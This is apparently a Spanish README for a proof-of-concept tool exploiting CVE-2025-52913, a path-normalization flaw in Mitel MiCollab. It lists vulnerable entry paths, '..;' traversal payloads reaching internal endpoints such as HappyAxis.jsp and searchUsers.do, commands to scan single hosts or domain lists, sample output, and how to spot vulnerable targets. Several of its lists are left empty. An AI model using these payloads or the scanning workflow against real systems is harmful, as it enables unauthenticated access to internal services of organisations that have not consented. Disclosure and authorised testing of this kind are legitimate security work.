
Una prueba de concepto (PoC) para CVE-2025-52913, una vulnerabilidad de normalización de rutas que afecta a Mitel MiCollab.
Este repositorio contiene una Prueba de Concepto (PoC) para CVE-2025-52913, una vulnerabilidad de normalización de rutas que afecta a Mitel MiCollab.
El problema permite a atacantes no autenticados evadir las restricciones de ruta previstas aprovechando secuencias de URL manipuladas como ..;, lo que conduce al acceso a endpoints internos de la aplicación.
La explotación exitosa puede permitir:
La vulnerabilidad puede activarse mediante las siguientes rutas:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
Ejemplos de payloads de traversal:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
Un objetivo es probablemente vulnerable si:
El servidor responde con HTTP 200
La respuesta contiene:
Axis2Axis2 Happiness PageLa vulnerabilidad surge de una normalización incorrecta de rutas manipuladas que contienen ..;, lo que permite el traversal más allá del contexto de aplicación previsto.
Este comportamiento puede exponer servicios internos como:
Descubierto por Dahmani Toumi
Este proyecto está destinado únicamente a fines educativos y pruebas de seguridad autorizadas.
No utilice esta herramienta contra sistemas sin permiso explícito. El autor no es responsable de ningún uso indebido o daño.